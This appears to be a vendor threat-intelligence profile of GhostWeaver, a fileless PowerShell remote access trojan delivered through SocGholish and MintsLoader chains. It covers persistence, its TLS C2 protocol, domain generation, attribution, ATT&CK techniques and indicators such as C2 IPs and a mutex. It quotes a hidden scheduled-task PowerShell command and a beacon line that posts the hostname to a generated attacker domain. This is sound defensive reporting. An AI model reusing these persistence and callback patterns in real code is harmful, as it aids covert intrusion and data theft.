GhostWeaver
GhostWeaver is a fileless, in-memory PowerShell remote access trojan/backdoor. Reporting describes it as a PowerShell RAT that maintains command-and-control over TLS 1.0 on TCP port 25658 using GZip-compressed JSON with a custom protocol, and that it generates server addresses through four separate domain generation algorithm routines. It also hardcodes public DNS resolvers to bypass local or enterprise DNS controls. The malware is designed to maintain persistent communication with its C2 infrastructure and can deliver additional payloads as plugins. Reported plugin capabilities include credential theft from browsers and Outlook, cryptocurrency wallet theft, web-form grabbing/web injection via a MITM proxy, browser data theft, and HTML manipulation. GhostWeaver can also redeploy MintsLoader, indicating a reinfection loop between loader and RAT.
GhostWeaver is described as adapting its installation and persistence to the antivirus product present on the victim machine, with four persistence modes observed. Its persistence framework reportedly uses a CMSTPLUA COM UAC bypass, masquerades process metadata as Windows Explorer, creates a scheduled task that runs every three minutes, and disables the Task Scheduler operational event log. Observed persistence artifacts include use of conhost --headless PowerShell, payload storage under %LOCALAPPDATA%\Microsoft{random_subfolder}{funcName}.log, and a registry marker at HKCU:\Software\Microsoft\ExpirienceHost. AV detections commonly label GhostWeaver as Pantera.
Delivery observed in the provided content is primarily through multi-stage malware chains associated with SocGholish/FakeUpdates and MintsLoader. Orange Cyberdefense reported SocGholish infections delivering loaders such as GhoLoader and MintsLoader, which then led to GhostWeaver alongside other payloads. MintsLoader is described as using obfuscated JavaScript and PowerShell, AMSI bypass, sandbox/VM evasion, and DGA-based infrastructure to selectively deliver GhostWeaver to real victim machines while serving decoys such as AsyncRAT to sandbox-like environments. SocGholish itself is delivered via compromised CMS-driven websites using fake browser update lures. The content also states GhostWeaver has been delivered as a PowerShell-based RAT via these fake update chains.
The malware is associated in the content with TA582, which Mandiant tracks as UNC4108, and is described as operating downstream of the SocGholish fake browser update ecosystem. Recorded Future identified GhostWeaver as the primary payload of TA582 within the TAG-124/LandUpdate808 and MintsLoader traffic distribution ecosystem. The broader delivery chain is also linked to TA569/SocGholish as an initial access mechanism. Targeting mentioned in the content comes from the surrounding MintsLoader and SocGholish campaigns, including industrial, legal, and energy sectors in the United States and Europe, as well as broad opportunistic targeting through compromised websites.
High-confidence indicators and technical characteristics directly mentioned in the content include TCP port 25658 for C2, TLS 1.0, GZip-compressed JSON protocol, four DGAs, mutex value euzizvuze, self-signed TLS certificate subject CN=GeoTrust LTD., and active C2 nodes observed at 178.156.128.182 and 86.107.101.93. The content also notes that GhostWeaver has been observed beaconing every three minutes for extended periods and that one reported capability is stealing credentials and cryptocurrency wallet information from web forms.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GhostWeaver is a fileless PowerShell RAT that maintains command-and-control (C2) over GZip-compressed JSON inside TLS 1.0 connections on port 25658. AV vendors detect it as Pantera.
GhostWeaver is a fileless PowerShell RAT (remote access trojan) that adapts its installation to whichever antivirus is running on the machine... It communicates over TLS on port 25658... It generates its own server addresses through four separate DGA routines...
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
Execution
3 techniques
Execution
Step 6 - Persistence: GhostWeaver Installation T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver Scheduled task: conhost --headless powershell -ep bypass Azure{FunctionName} every 3 minutes.
Persistence
2 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
Step 6 - Persistence: GhostWeaver Installation T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver Scheduled task: conhost --headless powershell -ep bypass Azure{FunctionName} every 3 minutes.
Stealth
7 techniques
Stealth
"The PS1 source is a single line of 280-630 KB using arithmetic char encoding"; "Arithmetic-obfuscated payload"
"swapping process metadata to pose as Windows Explorer so the COM security check passes."
Step 6 - Persistence: GhostWeaver Installation T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver
"We deobfuscated the PowerShell source (855 strings across three obfuscation layers)"; "decoded the C2 wire protocol"
"Before the RAT arrives, a profiler called MintsLoader runs three checks... virtual machine, the GPU type, and the number of CPU cache levels... withheld the payload."
Defense Impairment
1 technique
Defense Impairment
Credential Access
3 techniques
Credential Access
Discovery
6 techniques
Discovery
"User $env:COMPUTERNAME"; "Callback: POST http://{DGA4}/htr.php?id={hostname}"
"OS Windows version string"; "Performance Win32_ComputerSystem.Domain"; "GPU check (Win32_VideoController)"; "CPU cache check (Win32_CacheMemory)"
"Before the RAT arrives, a profiler called MintsLoader runs three checks... virtual machine, the GPU type, and the number of CPU cache levels... withheld the payload."
Collection
1 technique
Collection
Command and Control
6 techniques
Command and Control
"The wire format is a 4-byte little-endian length header followed by GZip-compressed JSON"
"GhostWeaver skips HTTP entirely. It communicates over raw TCP on port 25658, wrapped in TLS 1.0"
Orange Cyberdefense said it has observed SocGholish infections delivering loaders like Gholoader and MintsLoader, which, in turn, lead to the deployment of additional payloads like GhostWeaver, LockBit, AsyncRAT, and NetSupport RAT.
Step 4 - C2 Resolution: Domain Generation Algorithm T1568.002 | MintsLoader, GhostWeaver Four distinct DGA algorithms across kill chain stages.
IOCs tracked for this family
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An additional payload observed downstream of SocGholish-delivered loaders.
A PowerShell backdoor delivered downstream from SocGholish-associated loaders.
A PowerShell backdoor observed as a downstream payload in SocGholish infection chains.
A PowerShell backdoor that steals credentials and cryptocurrency wallet information from web forms.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.